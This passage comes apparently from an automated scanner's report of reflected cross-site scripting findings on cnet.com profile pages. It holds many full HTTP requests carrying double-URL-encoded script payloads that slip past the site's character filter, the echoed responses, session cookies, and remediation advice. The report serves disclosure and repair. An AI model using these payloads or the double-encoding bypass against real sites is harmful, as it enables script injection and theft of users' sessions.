There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here inside a double-quoted attribute value, so " must be encoded as well as <, > and &) so that a future bypass of the filter does not become script execution.
Request
GET /profile/ngodongb999d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54c4c248520/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:30 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:30 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=980 Connection: Keep-Alive Content-Length: 31087
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="ngodongb999d"><script>alert(1)</script>54c4c248520"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ba9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee89d8280026 was submitted in the REST URL parameter 2. This input was echoed as 84ba9"><script>alert(1)</script>e89d8280026 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here inside a double-quoted attribute value, so " must be encoded as well as <, > and &) so that a future bypass of the filter does not become script execution.
Request
GET /profile/nofinway84ba9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee89d8280026/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:13 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:14 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=957 Connection: Keep-Alive Content-Length: 31063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="nofinway84ba9"><script>alert(1)</script>e89d8280026"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fff91%253cscript%253ealert%25281%2529%253c%252fscript%253e51f330b44a2 was submitted in the REST URL parameter 2. This input was echoed as fff91<script>alert(1)</script>51f330b44a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here as text between tags, so at least <, > and & must be encoded) so that a future bypass of the filter does not become script execution.
Request
GET /profile/nofinwayfff91%253cscript%253ealert%25281%2529%253c%252fscript%253e51f330b44a2/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:15 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:15 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=986 Connection: Keep-Alive Content-Length: 31016
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>nofinwayfff91<script>alert(1)</script>51f330b44a2's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63cac%253cscript%253ealert%25281%2529%253c%252fscript%253ea90a464add5 was submitted in the REST URL parameter 2. This input was echoed as 63cac<script>alert(1)</script>a90a464add5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here as text between tags, so at least <, > and & must be encoded) so that a future bypass of the filter does not become script execution.
Request
GET /profile/paulisdead63cac%253cscript%253ealert%25281%2529%253c%252fscript%253ea90a464add5/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:38 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:38 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=963 Connection: Keep-Alive Content-Length: 31030
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>paulisdead63cac<script>alert(1)</script>a90a464add5's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80eb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d36934a7d3 was submitted in the REST URL parameter 2. This input was echoed as 80eb6"><script>alert(1)</script>3d36934a7d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here inside a double-quoted attribute value, so " must be encoded as well as <, > and &) so that a future bypass of the filter does not become script execution.
Request
GET /profile/paulisdead80eb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d36934a7d3/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:37 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:37 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=990 Connection: Keep-Alive Content-Length: 31104
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="paulisdead80eb6"><script>alert(1)</script>3d36934a7d3"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deee0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef33207010d2 was submitted in the REST URL parameter 2. This input was echoed as deee0"><script>alert(1)</script>f33207010d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here inside a double-quoted attribute value, so " must be encoded as well as <, > and &) so that a future bypass of the filter does not become script execution.
Request
GET /profile/peterbutlerdeee0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef33207010d2/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:31 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:31 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=995 Connection: Keep-Alive Content-Length: 31150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="peterbutlerdeee0"><script>alert(1)</script>f33207010d2"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1c7c%253cscript%253ealert%25281%2529%253c%252fscript%253efc0a807e27d was submitted in the REST URL parameter 2. This input was echoed as b1c7c<script>alert(1)</script>fc0a807e27d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here as text between tags, so at least <, > and & must be encoded) so that a future bypass of the filter does not become script execution.
Request
GET /profile/peterbutlerb1c7c%253cscript%253ealert%25281%2529%253c%252fscript%253efc0a807e27d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:32 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:32 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Length: 31062
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>peterbutlerb1c7c<script>alert(1)</script>fc0a807e27d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 240be%253cscript%253ealert%25281%2529%253c%252fscript%253e7ff8fd6c80d was submitted in the REST URL parameter 2. This input was echoed as 240be<script>alert(1)</script>7ff8fd6c80d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here as text between tags, so at least <, > and & must be encoded) so that a future bypass of the filter does not become script execution.
Request
GET /profile/rafe240be%253cscript%253ealert%25281%2529%253c%252fscript%253e7ff8fd6c80d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:39 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:39 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=987
Connection: Keep-Alive
Content-Length: 30969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>rafe240be<script>alert(1)</script>7ff8fd6c80d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a65a0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9368331407d was submitted in the REST URL parameter 2. This input was echoed as a65a0"><script>alert(1)</script>9368331407d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rafea65a0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9368331407d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:38 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:38 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=998
Connection: Keep-Alive
Content-Length: 30993
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="rafea65a0"><script>alert(1)</script>9368331407d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba9bf%253cscript%253ealert%25281%2529%253c%252fscript%253e34953908a02 was submitted in the REST URL parameter 2. This input was echoed as ba9bf<script>alert(1)</script>34953908a02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/raygun01ba9bf%253cscript%253ealert%25281%2529%253c%252fscript%253e34953908a02/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:05 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:05 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=944
Connection: Keep-Alive
Content-Length: 31052
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>raygun01ba9bf<script>alert(1)</script>34953908a02's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe22%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1f866ca59f was submitted in the REST URL parameter 2. This input was echoed as abe22"><script>alert(1)</script>1f866ca59f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/raygun01abe22%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1f866ca59f/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
